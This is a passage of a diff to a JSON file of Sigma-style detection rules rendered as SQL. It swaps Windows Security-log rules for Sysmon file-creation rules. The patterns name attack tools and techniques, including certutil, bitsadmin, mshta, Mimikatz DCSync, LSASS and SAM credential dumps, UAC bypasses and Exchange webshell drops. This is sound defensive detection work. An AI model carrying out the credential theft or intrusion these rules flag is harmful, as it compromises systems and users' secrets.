ESCAPE '\\' OR TaskContentNew LIKE '%powershell%' ESCAPE '\\' OR TaskContentNew LIKE '%pwsh%' ESCAPE '\\' OR TaskContentNew LIKE '%mshta%' ESCAPE '\\' OR TaskContentNew LIKE '%wscript%' ESCAPE '\\' OR TaskContentNew LIKE '%cscript%' ESCAPE '\\' OR TaskContentNew LIKE '%certutil%' ESCAPE '\\' OR TaskContentNew LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContentNew LIKE '%bash.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%bash %' ESCAPE '\\' OR TaskContentNew LIKE '%scrcons%' ESCAPE '\\' OR TaskContentNew LIKE '%wmic %' ESCAPE '\\' OR TaskContentNew LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%forfiles%' ESCAPE '\\' OR TaskContentNew LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContentNew LIKE '%hh.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\PSEXEC-%' ESCAPE '\\' AND TargetFilename LIKE '%.key' ESCAPE '\\')" ], - "filename": "win_security_susp_scheduled_task_update.yml" + "filename": "file_event_win_psexec_service_key.yml" }, { - "title": "KrbRelayUp Attack Pattern", - "id": "749c9f5e-b353-4b90-a9c1-05243357ca4b", + "title": "Suspicious ASPX File Drop by Exchange", + "id": "bd1212e5-78da-431e-95fa-c58e3237a8e6", "status": "experimental", - "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", - "author": "@SBousseaden, Florian Roth", + "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", + "author": "Florian Roth (Nextron Systems), MSTI (query, idea)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND AuthenticationPackageName = 'Kerberos' AND IpAddress = '127.0.0.1' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND TargetUserSid LIKE '%-500' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%FrontEnd\\\\HttpProxy\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\aspnet\\_client\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\'))" ], - "filename": "win_security_susp_krbrelayup.yml" + "filename": "file_event_win_exchange_webshell_drop.yml" }, { - "title": "RottenPotato Like Attack Pattern", - "id": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", - "status": "test", - "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", - "author": "@SBousseaden, Florian Roth", + "title": "Suspicious File Creation In Uncommon AppData Folder", + "id": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", + "status": "experimental", + "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1557.001" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND TargetUserName = 'ANONYMOUS LOGON' AND WorkstationName = '-' AND IpAddress IN ('127.0.0.1', '::1'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.psm1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\LocalLow\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_susp_rottenpotato.yml" + "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml" }, { - "title": "Windows Defender Exclusion Set", - "id": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", - "status": "test", - "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender", - "author": "@BarryShooshooga", + "title": "Suspicious Executable File Creation", + "id": "74babdd6-a758-4549-9632-26535279e654", + "status": "experimental", + "description": "Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1564" ], "falsepositives": [ - "Intended inclusions by administrator" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4660', '4663') AND ObjectName LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%.bat.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$Recycle.Bin.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Documents and Settings.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\MSOCache.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Recovery.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs.exe' ESCAPE '\\')))" ], - "filename": "win_security_defender_bypass.yml" + "filename": "file_event_win_susp_executable_creation.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - Security", - "id": "4edf51e1-cb83-4e1a-bc39-800e396068e3", - "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "UAC Bypass Using MSConfig Token Modification - File", + "id": "41bb431f-56d8-4691-bb56-ed34e390906f", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%clipboard]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_clip_services_security.yml" + "filename": "file_event_win_uac_bypass_msconfig_gui.yml" }, { - "title": "Mimikatz DC Sync", - "id": "611eab06-a145-4dfa-a295-3ccc5c20f59a", + "title": "Wmiexec Default Output File", + "id": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", "status": "experimental", - "description": "Detects Mimikatz DC sync security events", - "author": "Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu", + "description": "Detects the creation of the default output filename used by the wmiexec tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.s0002", - "attack.t1003.006" + "attack.lateral_movement", + "attack.t1047" ], "falsepositives": [ - "Valid DC Sync that is not covered by the filters; please report", - "Local Domain Admin account used for Azure AD Connect" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND (Properties LIKE '%Replicating Directory Changes All%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%9923a32a-3607-11d2-b9be-0000f87a36b2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\') AND AccessMask = '0x100') AND NOT ((SubjectDomainName = 'Window Manager') OR ((SubjectUserName LIKE 'NT AUT%' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\')) OR (SubjectUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename REGEXP '\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'C:\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'D:\\\\__1\\d{9}\\.\\d{1,7}$'))" ], - "filename": "win_security_dcsync.yml" + "filename": "file_event_win_wmiexec_default_filename.yml" }, { - "title": "Weak Encryption Enabled and Kerberoast", - "id": "f6de9536-0441-4b3f-a646-f4e00f300ffd", - "status": "test", - "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", - "author": "@neu5ron", + "title": "Suspicious Creation with Colorcpl", + "id": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", + "status": "experimental", + "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1564" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4738' AND ((((NewUacValue LIKE '%8___' ESCAPE '\\' OR NewUacValue LIKE '%9___' ESCAPE '\\' OR NewUacValue LIKE '%A___' ESCAPE '\\' OR NewUacValue LIKE '%B___' ESCAPE '\\' OR NewUacValue LIKE '%C___' ESCAPE '\\' OR NewUacValue LIKE '%D___' ESCAPE '\\' OR NewUacValue LIKE '%E___' ESCAPE '\\' OR NewUacValue LIKE '%F___' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8___' ESCAPE '\\' OR OldUacValue LIKE '%9___' ESCAPE '\\' OR OldUacValue LIKE '%A___' ESCAPE '\\' OR OldUacValue LIKE '%B___' ESCAPE '\\' OR OldUacValue LIKE '%C___' ESCAPE '\\' OR OldUacValue LIKE '%D___' ESCAPE '\\' OR OldUacValue LIKE '%E___' ESCAPE '\\' OR OldUacValue LIKE '%F___' ESCAPE '\\'))) OR ((NewUacValue LIKE '%1____' ESCAPE '\\' OR NewUacValue LIKE '%3____' ESCAPE '\\' OR NewUacValue LIKE '%5____' ESCAPE '\\' OR NewUacValue LIKE '%7____' ESCAPE '\\' OR NewUacValue LIKE '%9____' ESCAPE '\\' OR NewUacValue LIKE '%B____' ESCAPE '\\' OR NewUacValue LIKE '%D____' ESCAPE '\\' OR NewUacValue LIKE '%F____' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%1____' ESCAPE '\\' OR OldUacValue LIKE '%3____' ESCAPE '\\' OR OldUacValue LIKE '%5____' ESCAPE '\\' OR OldUacValue LIKE '%7____' ESCAPE '\\' OR OldUacValue LIKE '%9____' ESCAPE '\\' OR OldUacValue LIKE '%B____' ESCAPE '\\' OR OldUacValue LIKE '%D____' ESCAPE '\\' OR OldUacValue LIKE '%F____' ESCAPE '\\')))) OR ((NewUacValue LIKE '%8__' ESCAPE '\\' OR NewUacValue LIKE '%9__' ESCAPE '\\' OR NewUacValue LIKE '%A__' ESCAPE '\\' OR NewUacValue LIKE '%B__' ESCAPE '\\' OR NewUacValue LIKE '%C__' ESCAPE '\\' OR NewUacValue LIKE '%D__' ESCAPE '\\' OR NewUacValue LIKE '%E__' ESCAPE '\\' OR NewUacValue LIKE '%F__' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8__' ESCAPE '\\' OR OldUacValue LIKE '%9__' ESCAPE '\\' OR OldUacValue LIKE '%A__' ESCAPE '\\' OR OldUacValue LIKE '%B__' ESCAPE '\\' OR OldUacValue LIKE '%C__' ESCAPE '\\' OR OldUacValue LIKE '%D__' ESCAPE '\\' OR OldUacValue LIKE '%E__' ESCAPE '\\' OR OldUacValue LIKE '%F__' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\colorcpl.exe' ESCAPE '\\' AND NOT (((TargetFilename LIKE '%.icm' ESCAPE '\\' OR TargetFilename LIKE '%.gmmp' ESCAPE '\\' OR TargetFilename LIKE '%.cdmp' ESCAPE '\\' OR TargetFilename LIKE '%.camp' ESCAPE '\\'))))" ], - "filename": "win_security_alert_enable_weak_encryption.yml" + "filename": "file_event_win_susp_colorcpl.yml" }, { - "title": "CVE-2023-23397 Exploitation Attempt", - "id": "73c59189-6a6d-4b9f-a748-8f6f9bbed75c", + "title": "BloodHound Collection Files", + "id": "02773bed-83bf-469f-b7ff-e676e7d78bab", "status": "experimental", - "description": "Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.", - "author": "Robert Lee @quantum_cookie", + "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", + "author": "C.J. May", "tags": [ - "attack.credential_access", - "attack.initial_access", - "cve.2023.23397" + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Searchprotocolhost.exe likes to query these registry keys. To avoid false postives, it's better to filter out those events before they reach the SIEM" + "Some false positives may arise in some environment and this may require some tuning. Add addional filters or reduce level depending on the level of noise" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%Services\\\\%' ESCAPE '\\' AND (ObjectName LIKE '%WebClient\\\\NetworkProvider' ESCAPE '\\' OR ObjectName LIKE '%LanmanWorkstation\\\\NetworkProvider' ESCAPE '\\') AND AccessList LIKE '%\\%\\%4416%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%BloodHound.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\_computers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_containers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_domains.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_gpos.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_groups.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_ous.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_users.json' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\pocket\\_containers.json' ESCAPE '\\')))" ], - "filename": "win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml" + "filename": "file_event_win_bloodhound_collection.yml" }, { - "title": "Active Directory User Backdoors", - "id": "300bac00-e041-4ee2-9c36-e262656a6ecc", - "status": "test", - "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", - "author": "@neu5ron", + "title": "CVE-2022-24527 Microsoft Connected Cache LPE", + "id": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", + "status": "experimental", + "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1098", - "attack.persistence" + "attack.privilege_escalation", + "attack.t1059.001", + "cve.2022.24527" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4738' AND NOT (AllowedToDelegateTo = '-' OR AllowedToDelegateTo = '')) OR ((EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToDelegateTo') OR (EventID = '5136' AND ObjectClass = 'user' AND AttributeLDAPDisplayName = 'servicePrincipalName') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToActOnBehalfOfOtherIdentity'))))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%WindowsPowerShell\\\\Modules\\\\webAdministration\\\\webAdministration.psm1' ESCAPE '\\' AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_security_alert_ad_user_backdoors.yml" + "filename": "file_event_win_cve_2022_24527_lpe.yml" }, { - "title": "Powerview Add-DomainObjectAcl DCSync AD Extend Right", - "id": "2c99737c-585d-4431-b61a-c911d86ff32f", + "title": "UAC Bypass Using EventVwr", + "id": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", "status": "experimental", - "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", - "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", + "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", + "author": "Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.defense_evasion", + "attack.privilege_escalation" ], "falsepositives": [ - "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5136' AND AttributeLDAPDisplayName = 'ntSecurityDescriptor' AND (AttributeValue LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT ((ObjectClass IN ('dnsNode', 'dnsZoneScope', 'dnsZone'))))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Microsoft\\\\Event Viewer\\\\RecentViews' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\EventV~1\\\\RecentViews' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_account_backdoor_dcsync_rights.yml" + "filename": "file_event_win_uac_bypass_eventvwr.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - Security", - "id": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", + "title": "WScript or CScript Dropper - File", + "id": "002bdb95-0cf1-46a6-9e08-d38c128a6127", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", + "author": "Tim Shelton", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\' AND (ServiceFileName LIKE '%${input}%' ESCAPE '\\' OR ServiceFileName LIKE '%noexit%' ESCAPE '\\') AND (ServiceFileName LIKE '% /c %' ESCAPE '\\' OR ServiceFileName LIKE '% /r %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\ProgramData%' ESCAPE '\\') AND (TargetFilename LIKE '%.jse' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.vba' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_stdin_services_security.yml" + "filename": "file_event_win_cscript_wscript_dropper.yml" }, { - "title": "Password Dumper Activity on LSASS", - "id": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", - "status": "test", - "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", - "author": "sigma", + "title": "UEFI Persistence Via Wpbbin - FileCreation", + "id": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", + "status": "experimental", + "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. Which could be indicative of UEFI based persistence method", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.defense_evasion", + "attack.t1542.001" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND AccessMask = '0x705' AND ObjectType LIKE 'SAM\\_DOMAIN' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" ], - "filename": "win_security_susp_lsass_dump.yml" + "filename": "file_event_win_wpbbin_persistence.yml" }, { - "title": "Successful Overpass the Hash Attempt", - "id": "192a0330-c20b-4356-90b6-7b7049ae0b87", + "title": "Suspicious Desktopimgdownldr Target File", + "id": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", "status": "test", - "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", - "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", + "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.s0002", - "attack.t1550.002" + "attack.defense_evasion", + "attack.t1105" ], "falsepositives": [ - "Runas command-line tool using /netonly parameter" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo' AND AuthenticationPackageName = 'Negotiate')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Personalization\\\\LockScreenImage\\\\%' ESCAPE '\\') AND NOT (TargetFilename LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%.jpg%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg%' ESCAPE '\\' OR TargetFilename LIKE '%.png%' ESCAPE '\\')))" ], - "filename": "win_security_overpass_the_hash.yml" + "filename": "file_event_win_susp_desktopimgdownldr_file.yml" }, { - "title": "New or Renamed User Account with '$' in Attribute 'SamAccountName'", - "id": "cfeed607-6aa4-4bbd-9627-b637deb723c8", - "status": "test", - "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", - "author": "Ilyas Ochkov, oscd.community", + "title": "WerFault LSASS Process Memory Dump", + "id": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", + "status": "experimental", + "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4720' AND SamAccountName LIKE '%$%' ESCAPE '\\') OR (EventID = '4781' AND NewTargetUserName LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\WerFault.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' OR TargetFilename LIKE '%lsass.exe%' ESCAPE '\\'))" ], - "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml" + "filename": "file_event_win_lsass_werfault_dump.yml" }, { - "title": "Ngrok Usage with Remote Desktop Service", - "id": "64d51a51-32a6-49f0-9f3d-17e34d640272", + "title": "Potential SAM Database Dump", + "id": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", "status": "experimental", - "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", + "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' AND EventID = '21' AND Address LIKE '%16777216%' ESCAPE '\\')" + "attack.credential_access", + "attack.t1003.002" ], - "filename": "win_terminalservices_rdp_ngrok.yml" - }, - { - "title": "New Firewall Exception Rule Added For A Suspicious Folder", - "id": "9e2575e7-2cb9-4da1-adc8-ed94221dca5e", - "status": "experimental", - "description": "Detects the addition of a rule to the Windows Firewall exception list where the application resides in a suspicious folder", - "author": "frack113", "falsepositives": [ - "Any legitimate application that runs from the AppData user directory" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2004', '2071') AND (ApplicationPath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ApplicationPath LIKE '%\\\\temp\\\\%' ESCAPE '\\')) AND NOT ((Action = '2') OR ((ApplicationPath LIKE '%AppData\\\\local\\\\microsoft\\\\teams\\\\current\\\\teams.exe' ESCAPE '\\' OR ApplicationPath LIKE '%AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' OR ApplicationPath LIKE '%AppData\\\\Local\\\\Programs\\\\Messenger\\\\Messenger.exe' ESCAPE '\\'))))" + "Rare cases of administrative activity" ], - "filename": "win_firewall_as_add_rule_susp_folder.yml" - }, - { - "title": "All Rules Have Been Deleted From The Windows Firewall Configuration", - "id": "79609c82-a488-426e-abcf-9f341a39365d", - "status": "experimental", - "description": "Detects when a all the rules have been deleted from the Windows Defender Firewall configuration", - "author": "frack113, Nasreddine Bencherchali", "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2033' AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\') OR (ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Temp\\\\sam' ESCAPE 